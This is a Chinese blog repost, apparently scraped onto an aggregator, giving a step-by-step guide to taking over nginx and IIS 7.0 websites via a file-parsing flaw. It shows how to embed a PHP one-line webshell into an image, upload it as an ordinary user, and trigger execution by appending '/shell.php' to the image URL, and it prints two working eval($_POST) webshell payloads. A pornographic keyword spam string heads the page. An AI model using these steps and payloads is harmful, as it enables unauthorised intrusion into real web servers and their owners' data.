日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當(dāng)前位置: 首頁 >

通杀IIS7.0畸形解析0day漏洞

發(fā)布時(shí)間:2024/7/19 28 豆豆
生活随笔 收集整理的這篇文章主要介紹了 通杀IIS7.0畸形解析0day漏洞 小編覺得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.

先合并一張PHP一句話圖片馬,合并方法:


①、DOS合并:copy 1.gif /b + 1.txt/a asp.gif


②、用edjpgcom,進(jìn)行圖片和一句話木馬的合并,


圖片隨便找一張.


【順帶著說一下edjpgcom的使用方法:打開edjpgcom.exe所在文件夾,然后把你所要修改的圖片拖動(dòng)到

edjpgcom.exe上面,然后edjpgcom.exe會(huì)自動(dòng)打開,寫入想要些的代碼即可】
一句話:

<?PHP fputs(fopen(’shell.php’,’w’),’<?php eval($_POST[cmd])?>’);?>
然后找個(gè)nginx的站,先注冊(cè)一個(gè)用戶然后在論壇上傳一張我們剛剛合并的圖片一句話馬。
找到圖片地址,然后在地址后面加個(gè)shell.php,在瀏覽器中運(yùn)行。
比如假設(shè)圖片地址為http://blog.exehack.com/tupian/1.jpg
則執(zhí)行地址為http://blog.exehack.com/tupian/1.jpg/shell.php
然后,會(huì)在目錄下生成shell.php。比如:http://blog.exehack.com/tupian/shell.php
shell.php就是我們的一句話地址。再拿一句話的客戶端連接這個(gè)一句話地址就好。
上面就是Nginx拿站全過程,IIS7.0的畸形解析和這個(gè)類似。?

?

找到某個(gè)使用IIS7.0架設(shè)的站,然后找到其中的圖片上傳點(diǎn)(不需要管理權(quán)限,普通注冊(cè)用戶即可搞定),把PHP大馬后綴改成.jpg,傳上去,得到圖片地址。

?

在圖片格式后面添加xx.php xx隨便你怎么填。只要后綴為.php就好。

?

<?fputs(fopen(“3Kin.PHP”,”w”),”<?eval(\$_POST[3Kin]);?>”)?>

轉(zhuǎn)載于:https://www.cnblogs.com/canlay/archive/2012/01/17/2325123.html

總結(jié)

以上是生活随笔為你收集整理的通杀IIS7.0畸形解析0day漏洞的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò),歡迎將生活随笔推薦給好友。